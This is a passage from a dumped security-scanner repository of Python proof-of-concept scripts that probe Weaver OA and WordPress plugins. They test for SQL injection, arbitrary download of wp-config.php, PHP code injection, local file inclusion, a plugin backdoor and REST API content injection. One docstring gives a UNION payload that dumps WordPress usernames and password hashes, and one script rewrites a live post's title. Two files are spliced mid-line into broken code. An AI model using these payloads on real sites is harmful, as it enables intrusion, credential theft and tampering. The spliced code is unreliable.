22 |         true_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=1"
23 |         false_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=2"
24 | 
25 |         try:
26 |             req1 = requests.get(self.url+true_url, headers=headers, timeout=10, verify=False)
27 |             req2 = requests.get(self.url+false_url, headers=headers, timeout=10, verify=False)
28 |             if r"attachment" in str(req1.headers) and r"attachment" not in str(req2.headers):
29 |                 cprint("[+]存在泛微OA filedownaction SQL注入漏洞...(高危)\tpayload: "+self.url+true_url, "red")
30 |                 return True
31 |             else:
32 |                 cprint("[-]不存在weaver_oa_download_sqli漏洞", "white", "on_grey")
33 | 
34 |         except:
35 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 | 
37 | if __name__ == "__main__":
38 |     warnings.filterwarnings("ignore")
39 |     testVuln = weaver_oa_download_sqli_BaseVerify(sys.argv[1])
40 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/weaver_oa_filedownload.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: 泛微OA downfile.php 任意文件下载漏洞
 5 | referer: 
 6 | author: Lucifer
 7 | description: fileid参数引起的布尔盲注。
 8 | '''
 9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 | 
15 | class weaver_oa_filedownload_BaseVerify:
16 |     def __init__(self, url):
17 |         self.url = url
18 | 
19 |     def run(self):
20 |         headers = {
21 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 |         }
23 |         payload = "/E-mobile/Data/downfile.php?url=123"
24 |         vulnurl = self.url + payload
25 |         try:
26 |             req = requests.get(self.url, headers=headers, timeout=10, verify=False)
27 |             if req.status_code == 200:
28 |                 m = re.search(r'No error in ([^<]+)', req.text)
29 |                 if m:
30 |                     cprint("[+]存在泛微OA downfile.php 任意文件下载漏洞...(高危)\tpayload: "+self.url, "red")
31 |                     return True
32 |                 else:
33 |                     cprint("[-]不存在weaver_oa_filedownload漏洞", "white", "on_grey")
34 | 
35 |         except:
36 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
37 | 
38 | if __name__ == "__main__":
39 |     warnings.filterwarnings("ignore")
40 |     testVuln = weaver_oa_filedownload_BaseVerify(sys.argv[1])
41 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_admin_ajax_filedownload.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress admin-ajax.php任意文件下载
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: 文件admin-ajax.php中,参数img存在任意文件下载漏洞。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class wordpress_admin_ajax_filedownload_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |             }
22 |         payload = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"DB_NAME" in req.text and r"DB_USER" in req.text:
27 |                 cprint("[+]存在wordpress admin-ajax.php任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在wordpress_admin_ajax_filedownload漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | if __name__ == "__main__":
36 |     warnings.filterwarnings("ignore")
37 |     testVuln = wordpress_admin_ajax_filedownload_BaseVerify(sys.argv[1])
38 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_display_widgets_backdoor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress display-widgets插件后门漏洞
 5 | referer: http://www.nsfocus.com.cn/upload/contents/2017/09/20170915174457_73771.pdf
 6 | author: Lucifer
 7 | description: wordpress display-widgets Version 2.6.1——Version 2.6.3.1 geolocation.php存在后门。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class wordpress_display_widgets_backdoor_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/wp-content/plugins/display-widgets/geolocation.php"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)
26 |             if req.status_code == 200:
27 |                 cprint("[+]存在wordpress display-widgets插件后门漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在wordpress_display_widgets_backdoor漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | if __name__ == "__main__":
36 |     warnings.filterwarnings("ignore")
37 |     testVuln = wordpress_display_widgets_backdoor_BaseVerify(sys.argv[1])
38 |     testVuln.run()
39 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_plugin_ShortCode_lfi.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress 插件shortcode0.2.3 本地文件包含
 5 | referer: https://www.exploit-db.com/exploits/34436
 6 | author: Lucifer
 7 | description: 文件force-download.php参数file未过滤存在文件包含漏洞。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class wordpress_plugin_ShortCode_lfi_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payloads = ["/force-download.php?file=force-download.php",
23 |                     "/wp/wp-content/force-download.php?file=force-download.php",
24 |                     "/wp-content/force-download.php?file=force-download.php",
25 |                     "/wp-content/themes/ucin/includes/force-download.php?file=force-download.php",
26 |                     "/wp-content/uploads/patientforms/force-download.php?file=force-download.php"] 
27 |         try:
28 |             for payload in payloads:
29 |                 vulnurl = self.url + payload
30 |                 req = requests.get(vulnurl, headers=headers, timeout=5, verify=False)
31 |                 if r"可能不存在漏洞", "cyan")
39 | 
40 | if __name__ == "__main__":
41 |     warnings.filterwarnings("ignore")
42 |     testVuln = wordpress_plugin_ShortCode_lfi_BaseVerify(sys.argv[1])
43 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_plugin_azonpop_sqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: Wordpress AzonPop插件SQL注入
 5 | referer: https://cxsecurity.com/issue/WLB-2016010049
 6 | author: Lucifer
 7 | description: payload:/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/ wp_users
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class wordpress_plugin_azonpop_sqli_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |             }
22 |         payload = "/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null%20/*!00000union*/%20select%201,2,/*!00000gRoup_ConCat(unhex(hex(Md5(1234))),0x3c2f62723e,unhex(hex(Md5(1234))))*/,4,5%20/*!00000from*/%20wp_users"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 |                 cprint("[+]存在Wordpress AzonPop插件SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在wordpress_plugin_azonpop_sqli漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | if __name__ == "__main__":
36 |     warnings.filterwarnings("ignore")
37 |     testVuln = wordpress_plugin_azonpop_sqli_BaseVerify(sys.argv[1])
38 |     testVuln.run()
39 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_plugin_mailpress_rce.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress 插件mailpress远程代码执行
 5 | referer: http://0day5.com/archives/3960
 6 | author: Lucifer
 7 | description: Mailpress存在越权调用,在不登陆的情况下,可以调用系统某些方法,造成远程命令执行。
 8 | '''
 9 | import re
10 | import sys
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 | 
16 | class wordpress_plugin_mailpress_rce_BaseVerify:
17 |     def __init__(self, url):
18 |         self.url = url
19 | 
20 |     def run(self):
21 |         headers = {
22 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 |         }
24 |         payload = "/wp-content/plugins/mailpress/mp-includes/action.php"
25 |         vulnurl = self.url + payload
26 |         post_data = {
27 |             "action":"autosave",
28 |             "id":0,
29 |             "revision":-1,
30 |             "toemail":"",
31 |             "toname":"",
32 |             "fromemail":"",
33 |             "fromname":"",
34 |             "to_list":1,
35 |             "Theme":"",
36 |             "subject":"", 
37 |             "html":"",
38 |             "plaintext":"",
39 |             "mail_format":"standard",
40 |             "autosave":1,
41 |         }
42 |         try:
43 |             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
44 |             start = req.text.find("可能不存在漏洞", "cyan")
58 | 
59 | if __name__ == "__main__":
60 |     warnings.filterwarnings("ignore")
61 |     testVuln = wordpress_plugin_mailpress_rce_BaseVerify(sys.argv[1])
62 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_restapi_sqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress rest api权限失效导致内容注入
 5 | referer: https://www.t00ls.net/thread-38046-1-1.html
 6 | author: Lucifer
 7 | description: 篡改文章权限。
 8 | '''
 9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 | 
15 | class wordpress_restapi_sqli_BaseVerify:
16 |     def __init__(self, url):
17 |         self.url = url
18 | 
19 |     def run(self):
20 |         headers = {
21 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 |         }
23 |         headers2 = {
24 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
25 |             "Content-Type":"application/json"
26 |         }
27 |         payload = "/index.php/wp-json/wp/v2/posts"
28 |         vulnurl = self.url + payload
29 |         try:
30 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
31 |             d = json.loads(req.text)
32 |             id_code = d[0]['id']
33 |             vulnurl = self.url + "/index.php/wp-json/wp/v2/posts/"+str(id_code)+"?id="+str(id_code)+"a"
34 |             post_data = {
35 |                 "title":"81dc9bdb52d04dc20036dbd8313ed055"
36 |             }
37 |             req = requests.post(vulnurl, data=json.dumps(post_data), headers=headers2, timeout=10, verify=False)
38 |             d = json.loads(req.text)
39 |             status = d['data']['status']
40 |             if status != 401 and status != 400:
41 |                 cprint("[+]存在wordpress rest api权限失效导致内容注入漏洞...(高危)\tpayload: "+vulnurl, "red")
42 |                 return True
43 | 
44 |             else:
45 |                 cprint("[-]不存在wordpress_restapi_sqli漏洞", "white", "on_grey")
46 | 
47 |         except:
48 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
49 | 
50 | if __name__ == "__main__":
51 |     warnings.filterwarnings("ignore")
52 |     testVuln = wordpress_restapi_sqli_BaseVerify(sys.argv[1])
53 |     testVuln.run()
54 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_url_redirect.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress插件跳转
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: feed-statistics.php中参数url未经过验证可跳转任意网站。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class wordpress_url_redirect_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"100e8a82eea1ef8416e585433fd8462e" in req.text:
27 |                 cprint("[+]存在wordpress插件跳转漏洞...(低危)\tpayload: "+vulnurl, "blue")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在wordpress_url_redirect漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | if __name__ == "__main__":
36 |     warnings.filterwarnings("ignore")
37 |     testVuln = wordpress_url_redirect_BaseVerify(sys.argv[1])
38 |     testVuln.run()
39 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_woocommerce_code_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress 插件WooCommerce PHP代码注入
 5 | referer: https://packetstormsecurity.com/files/135000/WordPress-WooCommerce-2.4.12-PHP-Code-Injection.html
 6 | author: Lucifer
 7 | description: 插件WooCommerce中,参数items_per_page存在PHP代码注入。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class wordpress_woocommerce_code_exec_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/produits/?items_per_page=%24%7b%40print(md5(1234))%7d&setListingType=grid"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 |                 cprint("[+]存在wordpress 插件WooCommerce PHP代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在wordpress_woocommerce_code_exec漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | if __name__ == "__main__":
36 |     warnings.filterwarnings("ignore")
37 |     testVuln = wordpress_woocommerce_code_exec_BaseVerify(sys.argv[1])
38 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/information/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/crossdomain_find.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/crossdomain_find.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/crossdomain_find.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/crossdomain_find.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/git_check.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/git_check.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/git_check.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/git_check.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/informationmain.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/informationmain.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/informationmain.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/informationmain.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jsp_conf_find.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jsp_conf_find.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jsp_conf_find.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jsp_conf_find.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/options_method.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/options_method.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/options_method.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/options_method.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/robots_find.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/robots_find.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/robots_find.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/robots_find.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/springboot_api.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/springboot_api.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/springboot_api.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/springboot_api.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/svn_check.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/svn_check.cpython-37.pyc


--------------------------------------------------------------------------------
